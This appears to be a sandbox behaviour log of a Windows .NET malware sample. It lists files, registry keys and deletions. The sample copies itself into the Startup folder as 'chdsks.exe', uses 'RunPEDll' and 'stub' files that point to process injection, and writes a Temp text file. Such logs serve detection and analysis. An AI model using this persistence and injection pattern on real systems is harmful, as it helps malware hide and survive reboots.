C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
\Device\NamedPipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406
C:\Windows\System32\Branding\Basebrd\Basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe"
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.Local\
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Seven01\AppData\Roaming\Microsoft
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.config
C:\Users\Seven01\AppData\Local\Temp\chds.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
\Device\NamedPipe\
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe.config
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll

Write Files

C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chdsks.exe
C:\Users\Seven01\AppData\Local\Temp\chdskskas.txt

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2100.1266359
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2100.1266359
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2100.1266406
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2312.1271562
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2312.1271562
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2312.1271562

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chds.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\31bd1f54\5a317755
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
